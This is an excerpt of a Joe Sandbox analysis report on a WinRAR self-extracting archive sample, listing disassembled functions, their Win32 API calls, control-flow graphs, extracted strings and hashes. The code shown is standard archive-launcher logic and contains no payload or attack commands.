                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB8EF
                                                                      • IsDialogMessageW.USER32(?,?), ref: 007DB902
                                                                      • TranslateMessage.USER32(?), ref: 007DB910
                                                                      • DispatchMessageW.USER32(?), ref: 007DB91A
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 007DB93D
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 007DB960
                                                                      • GetDlgItem.USER32(?,00000068), ref: 007DB983
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DB99E
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DB9B1
                                                                        • Part of subcall function 007DD453: _wcschr.LIBVCRUNTIME ref: 007DD45C
                                                                        • Part of subcall function 007DD453: _wcslen.LIBCMT ref: 007DD47D
                                                                      • SetFocus.USER32(00000000), ref: 007DB9B8
                                                                      • _swprintf.LIBCMT ref: 007DBA24
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007DD4D4: GetDlgItem.USER32(00000068,0081FCB8), ref: 007DD4E8
                                                                        • Part of subcall function 007DD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,007DAF07,00000001,?,?,007DB7B9,007F506C,0081FCB8,0081FCB8,00001000,00000000,00000000), ref: 007DD510
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DD51B
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DD529
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD53F
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007DD559
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD59D
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007DD5AB
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD5BA
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD5E1
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007F43F4), ref: 007DD5F0
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 007DBA68
                                                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 007DBA90
                                                                      • GetTickCount.KERNEL32 ref: 007DBAAE
                                                                      • _swprintf.LIBCMT ref: 007DBAC2
                                                                      • GetLastError.KERNEL32(?,00000011), ref: 007DBAF4
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 007DBB43
                                                                      • _swprintf.LIBCMT ref: 007DBB7C
                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 007DBBD0
                                                                      • GetCommandLineW.KERNEL32 ref: 007DBBEA
                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 007DBC47
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 007DBC6F
                                                                      • Sleep.KERNEL32(00000064), ref: 007DBCB9
                                                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 007DBCE2
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007DBCEB
                                                                      • _swprintf.LIBCMT ref: 007DBD1E
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DBD7D
                                                                      • SetDlgItemTextW.USER32(?,00000065,007F35F4), ref: 007DBD94
                                                                      • GetDlgItem.USER32(?,00000065), ref: 007DBD9D
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DBDAC
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007DBDBB
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DBE68
                                                                      • _wcslen.LIBCMT ref: 007DBEBE
                                                                      • _swprintf.LIBCMT ref: 007DBEE8
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 007DBF32
                                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 007DBF4C
                                                                      • GetDlgItem.USER32(?,00000068), ref: 007DBF55
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 007DBF6B
                                                                      • GetDlgItem.USER32(?,00000066), ref: 007DBF85
                                                                      • SetWindowTextW.USER32(00000000,0080A472), ref: 007DBFA7
                                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 007DC007
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DC01A
                                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 007DC0BD
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 007DC197
                                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 007DC1D9
                                                                        • Part of subcall function 007DC73F: __EH_prolog.LIBCMT ref: 007DC744
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DC1FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<}$STARTDLG$^}$__tmp_rar_sfx_access_check_%u$h}$winrarsfxmappingfile.tmp
                                                                      • API String ID: 3829768659-445573310
                                                                      • Opcode ID: 1b995f9da3d9aab602b22f3efb7eb76cb45accbd2842fa7e6c7967e64b1fbaaf
                                                                      • Instruction ID: 674d2a34a613b835f41e32798a9d278f58262e75935e1ea472b97cb86716b8a8
                                                                      • Opcode Fuzzy Hash: 1b995f9da3d9aab602b22f3efb7eb76cb45accbd2842fa7e6c7967e64b1fbaaf
                                                                      • Instruction Fuzzy Hash: D442F3B1944659FAEB22ABB0DC4EFBE777CBB01700F00405AF644A62D2CB7C5A44CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 269 7d0863-7d0886 call 7dec50 GetModuleHandleW 272 7d0888-7d089f GetProcAddress 269->272 273 7d08e7-7d0b48 269->273 276 7d08b9-7d08c9 GetProcAddress 272->276 277 7d08a1-7d08b7 272->277 274 7d0b4e-7d0b59 call 7e75fb 273->274 275 7d0c14-7d0c40 GetModuleFileNameW call 7cc29a call 7d0602 273->275 274->275 287 7d0b5f-7d0b8d GetModuleFileNameW CreateFileW 274->287 293 7d0c42-7d0c4e call 7cb146 275->293 278 7d08cb-7d08e0 276->278 279 7d08e5 276->279 277->276 278->279 279->273 289 7d0b8f-7d0b9b SetFilePointer 287->289 290 7d0c08-7d0c0f CloseHandle 287->290 289->290 291 7d0b9d-7d0bb9 ReadFile 289->291 290->275 291->290 294 7d0bbb-7d0be0 291->294 298 7d0c7d-7d0ca4 call 7cc310 GetFileAttributesW 293->298 299 7d0c50-7d0c5b call 7d081b 293->299 297 7d0bfd-7d0c06 call 7d0371 294->297 297->290 306 7d0be2-7d0bfc call 7d081b 297->306 309 7d0cae 298->309 310 7d0ca6-7d0caa 298->310 299->298 308 7d0c5d-7d0c7b CompareStringW 299->308 306->297 308->298 308->310 313 7d0cb0-7d0cb5 309->313 310->293 312 7d0cac 310->312 312->313 314 7d0cec-7d0cee 313->314 315 7d0cb7 313->315 316 7d0dfb-7d0e05 314->316 317 7d0cf4-7d0d0b call 7cc2e4 call 7cb146 314->317 318 7d0cb9-7d0ce0 call 7cc310 GetFileAttributesW 315->318 328 7d0d0d-7d0d6e call 7d081b * 2 call 7ce617 call 7c4092 call 7ce617 call 7da7e4 317->328 329 7d0d73-7d0da6 call 7c4092 AllocConsole 317->329 323 7d0cea 318->323 324 7d0ce2-7d0ce6 318->324 323->314 324->318 326 7d0ce8 324->326 326->314 335 7d0df3-7d0df5 ExitProcess 328->335 334 7d0da8-7d0ded GetCurrentProcessId AttachConsole call 7e3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->334 329->335 334->335
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 007D087C
                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007D088E
                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007D08BF
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007D0B69
                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007D0B83
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007D0B93
                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,007F3C7C,00000000), ref: 007D0BB1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007D0C09
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007D0C1E
                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,007F3C7C,?,00000000,?,00000800), ref: 007D0C72
                                                                      • GetFileAttributesW.KERNELBASE(?,?,007F3C7C,00000800,?,00000000,?,00000800), ref: 007D0C9C
                                                                      • GetFileAttributesW.KERNEL32(?,?,007F3D44,00000800), ref: 007D0CD8
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • _swprintf.LIBCMT ref: 007D0D4A
                                                                      • _swprintf.LIBCMT ref: 007D0D96
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • AllocConsole.KERNEL32 ref: 007D0D9E
                                                                      • GetCurrentProcessId.KERNEL32 ref: 007D0DA8
                                                                      • AttachConsole.KERNEL32(00000000), ref: 007D0DAF
                                                                      • _wcslen.LIBCMT ref: 007D0DC4
                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007D0DD5
                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 007D0DDC
                                                                      • Sleep.KERNEL32(00002710), ref: 007D0DE7
                                                                      • FreeConsole.KERNEL32 ref: 007D0DED
                                                                      • ExitProcess.KERNEL32 ref: 007D0DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                      • API String ID: 1207345701-3298887752
                                                                      • Opcode ID: cdf9bdcb415d9eb8e1a9c62982bcd886efcb78fb78ac2ea9c896716f073931c3
                                                                      • Instruction ID: f4f8135009e4a261c23a1b0593717d329235084b6aa27ec9c85a140185820e90
                                                                      • Opcode Fuzzy Hash: cdf9bdcb415d9eb8e1a9c62982bcd886efcb78fb78ac2ea9c896716f073931c3
                                                                      • Instruction Fuzzy Hash: AFD15AB1504348ABD7219F50C849BAFBBF9BF85704F50492EF38996350DB7C8648CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DC73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 348 7dc73f-7dc757 call 7deb78 call 7dec50 353 7dd40d-7dd418 348->353 354 7dc75d-7dc787 call 7db314 348->354 354->353 357 7dc78d-7dc792 354->357 358 7dc793-7dc7a1 357->358 359 7dc7a2-7dc7b7 call 7daf98 358->359 362 7dc7b9 359->362 363 7dc7bb-7dc7d0 call 7d1fbb 362->363 366 7dc7dd-7dc7e0 363->366 367 7dc7d2-7dc7d6 363->367 369 7dd3d9-7dd404 call 7db314 366->369 370 7dc7e6 366->370 367->363 368 7dc7d8 367->368 368->369 369->358 382 7dd40a-7dd40c 369->382 372 7dc7ed-7dc7f0 370->372 373 7dca7c-7dca7e 370->373 374 7dca5f-7dca61 370->374 375 7dc9be-7dc9c0 370->375 372->369 380 7dc7f6-7dc850 call 7da64d call 7cbdf3 call 7ca544 call 7ca67e call 7c6edb 372->380 373->369 377 7dca84-7dca8b 373->377 374->369 376 7dca67-7dca77 SetWindowTextW 374->376 375->369 379 7dc9c6-7dc9d2 375->379 376->369 377->369 381 7dca91-7dcaaa 377->381 383 7dc9d4-7dc9e5 call 7e7686 379->383 384 7dc9e6-7dc9eb 379->384 434 7dc98f-7dc9a4 call 7ca5d1 380->434 386 7dcaac 381->386 387 7dcab2-7dcac0 call 7e3e13 381->387 382->353 383->384 390 7dc9ed-7dc9f3 384->390 391 7dc9f5-7dca00 call 7db48e 384->391 386->387 387->369 404 7dcac6-7dcacf 387->404 395 7dca05-7dca07 390->395 391->395 400 7dca09-7dca10 call 7e3e13 395->400 401 7dca12-7dca32 call 7e3e13 call 7e3e3e 395->401 400->401 422 7dca4b-7dca4d 401->422 423 7dca34-7dca3b 401->423 408 7dcaf8-7dcafb 404->408 409 7dcad1-7dcad5 404->409 411 7dcb01-7dcb04 408->411 412 7dcbe0-7dcbee call 7d0602 408->412 409->411 414 7dcad7-7dcadf 409->414 416 7dcb06-7dcb0b 411->416 417 7dcb11-7dcb2c 411->417 432 7dcbf0-7dcc04 call 7e279b 412->432 414->369 420 7dcae5-7dcaf3 call 7d0602 414->420 416->412 416->417 435 7dcb2e-7dcb68 417->435 436 7dcb76-7dcb7d 417->436 420->432 422->369 431 7dca53-7dca5a call 7e3e2e 422->431 429 7dca3d-7dca3f 423->429 430 7dca42-7dca4a call 7e7686 423->430 429->430 430->422 431->369 447 7dcc06-7dcc0a 432->447 448 7dcc11-7dcc62 call 7d0602 call 7db1be GetDlgItem SetWindowTextW SendMessageW call 7e3e49 432->448 452 7dc9aa-7dc9b9 call 7ca55a 434->452 453 7dc855-7dc869 SetFileAttributesW 434->453 471 7dcb6c-7dcb6e 435->471 472 7dcb6a 435->472 441 7dcb7f-7dcb97 call 7e3e13 436->441 442 7dcbab-7dcbce call 7e3e13 * 2 436->442 441->442 458 7dcb99-7dcba6 call 7d05da 441->458 442->432 476 7dcbd0-7dcbde call 7d05da 442->476 447->448 454 7dcc0c-7dcc0e 447->454 482 7dcc67-7dcc6b 448->482 452->369 460 7dc90f-7dc91f GetFileAttributesW 453->460 461 7dc86f-7dc8a2 call 7cb991 call 7cb690 call 7e3e13 453->461 454->448 458->442 460->434 469 7dc921-7dc930 DeleteFileW 460->469 491 7dc8b5-7dc8c3 call 7cbdb4 461->491 492 7dc8a4-7dc8b3 call 7e3e13 461->492 469->434 475 7dc932-7dc935 469->475 471->436 472->471 479 7dc939-7dc965 call 7c4092 GetFileAttributesW 475->479 476->432 489 7dc937-7dc938 479->489 490 7dc967-7dc97d MoveFileW 479->490 482->369 486 7dcc71-7dcc85 SendMessageW 482->486 486->369 489->479 490->434 493 7dc97f-7dc989 MoveFileExW 490->493 491->452 498 7dc8c9-7dc908 call 7e3e13 call 7dfff0 491->498 492->491 492->498 493->434 498->460
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DC744
                                                                        • Part of subcall function 007DB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007DB3FB
                                                                        • Part of subcall function 007DAF98: _wcschr.LIBVCRUNTIME ref: 007DB033
                                                                      • _wcslen.LIBCMT ref: 007DCA0A
                                                                      • _wcslen.LIBCMT ref: 007DCA13
                                                                      • SetWindowTextW.USER32(?,?), ref: 007DCA71
                                                                      • _wcslen.LIBCMT ref: 007DCAB3
                                                                      • _wcsrchr.LIBVCRUNTIME ref: 007DCBFB
                                                                      • GetDlgItem.USER32(?,00000066), ref: 007DCC36
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 007DCC46
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,0080A472), ref: 007DCC54
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007DCC7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                      • String ID: %s.%d.tmp$<br>$<}$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$}
                                                                      • API String ID: 986293930-4027513541
                                                                      • Opcode ID: 413d17f9cf0f250cfd4a83ec03152c2637243f22797d814b2d3b996ae228d667
                                                                      • Instruction ID: be91057a104c9ca1d56693f848d127219f18b53f29bc27abdc0b24045a78302f
                                                                      • Opcode Fuzzy Hash: 413d17f9cf0f250cfd4a83ec03152c2637243f22797d814b2d3b996ae228d667
                                                                      • Instruction Fuzzy Hash: B6E155B2900159EADB25DBA4DD59EEE73BCAF04350F4480A7F649E7140EB789E44CF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CDA67 Relevance: 25.2, APIs: 5, Strings: 9, Instructions: 663COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007CDA70
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CDA91
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007CDAAC
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007CBAE9,00000000,?,?,?,0001047C), ref: 007D1BA0
                                                                      • _wcslen.LIBCMT ref: 007CDDE9
                                                                      • __fprintf_l.LIBCMT ref: 007CDF1C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                      • API String ID: 557298264-801612888
                                                                      • Opcode ID: 4e44441c17e529e8420631a31150f71e8de2372d10935facbd0ccae8b6879c25
                                                                      • Instruction ID: 9b9c114a09483857cf47e70cffc253dcd4aa9063a1ccc62bf4437418d83aafe3
                                                                      • Opcode Fuzzy Hash: 4e44441c17e529e8420631a31150f71e8de2372d10935facbd0ccae8b6879c25
                                                                      • Instruction Fuzzy Hash: 2232C071900218EBCB24EF68C849FEA77A5FF18704F54416EF90697281E7B9ED85CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      • GetDlgItem.USER32(00000068,0081FCB8), ref: 007DD4E8
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,007DAF07,00000001,?,?,007DB7B9,007F506C,0081FCB8,0081FCB8,00001000,00000000,00000000), ref: 007DD510
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DD51B
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DD529
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD53F
                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007DD559
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD59D
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007DD5AB
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD5BA
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD5E1
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F43F4), ref: 007DD5F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                      • String ID: \
                                                                      • API String ID: 3569833718-2967466578
                                                                      • Opcode ID: fdb0c47f75fbc24f56b57e79b1c9736f89ea40ff5b4a30d1b849f10bb355368c
                                                                      • Instruction ID: ccaaf8277e0ffd70e61ab11edd0e9579158c5c29e7acbd7563c94d05bf694de6
                                                                      • Opcode Fuzzy Hash: fdb0c47f75fbc24f56b57e79b1c9736f89ea40ff5b4a30d1b849f10bb355368c
                                                                      • Instruction Fuzzy Hash: AF31F371144B42EFD321DF20EC1AFAB7FACFB86304F004519F691962E0DB688A058B76
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DD78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 813 7dd78f-7dd7a7 call 7dec50 816 7dd7ad-7dd7b9 call 7e3e13 813->816 817 7dd9e8-7dd9f0 813->817 816->817 820 7dd7bf-7dd7e7 call 7dfff0 816->820 823 7dd7e9 820->823 824 7dd7f1-7dd7ff 820->824 823->824 825 7dd801-7dd804 824->825 826 7dd812-7dd818 824->826 827 7dd808-7dd80e 825->827 828 7dd85b-7dd85e 826->828 830 7dd837-7dd844 827->830 831 7dd810 827->831 828->827 829 7dd860-7dd866 828->829 832 7dd86d-7dd86f 829->832 833 7dd868-7dd86b 829->833 835 7dd84a-7dd84e 830->835 836 7dd9c0-7dd9c2 830->836 834 7dd822-7dd82c 831->834 839 7dd882-7dd898 call 7cb92d 832->839 840 7dd871-7dd878 832->840 833->832 833->839 841 7dd82e 834->841 842 7dd81a-7dd820 834->842 837 7dd854-7dd859 835->837 838 7dd9c6 835->838 836->838 837->828 846 7dd9cf 838->846 849 7dd89a-7dd8a7 call 7d1fbb 839->849 850 7dd8b1-7dd8bc call 7ca231 839->850 840->839 843 7dd87a 840->843 841->830 842->834 845 7dd830-7dd833 842->845 843->839 845->830 848 7dd9d6-7dd9d8 846->848 851 7dd9da-7dd9dc 848->851 852 7dd9e7 848->852 849->850 860 7dd8a9 849->860 858 7dd8be-7dd8d5 call 7cb6c4 850->858 859 7dd8d9-7dd8dd 850->859 851->852 856 7dd9de-7dd9e1 ShowWindow 851->856 852->817 856->852 858->859 863 7dd8e4-7dd8e6 859->863 860->850 863->852 864 7dd8ec-7dd8f9 863->864 865 7dd90c-7dd90e 864->865 866 7dd8fb-7dd902 864->866 868 7dd925-7dd944 call 7ddc3b 865->868 869 7dd910-7dd919 865->869 866->865 867 7dd904-7dd90a 866->867 867->865 870 7dd97b-7dd987 CloseHandle 867->870 868->870 883 7dd946-7dd94e 868->883 869->868 878 7dd91b-7dd923 ShowWindow 869->878 872 7dd989-7dd996 call 7d1fbb 870->872 873 7dd998-7dd9a6 870->873 872->846 872->873 873->848 877 7dd9a8-7dd9aa 873->877 877->848 881 7dd9ac-7dd9b2 877->881 878->868 881->848 882 7dd9b4-7dd9be 881->882 882->848 883->870 884 7dd950-7dd961 GetExitCodeProcess 883->884 884->870 885 7dd963-7dd96d 884->885 886 7dd96f 885->886 887 7dd974 885->887 886->887 887->870
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007DD7AE
                                                                      • ShellExecuteExW.SHELL32(?), ref: 007DD8DE
                                                                      • ShowWindow.USER32(?,00000000), ref: 007DD91D
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 007DD959
                                                                      • CloseHandle.KERNEL32(?), ref: 007DD97F
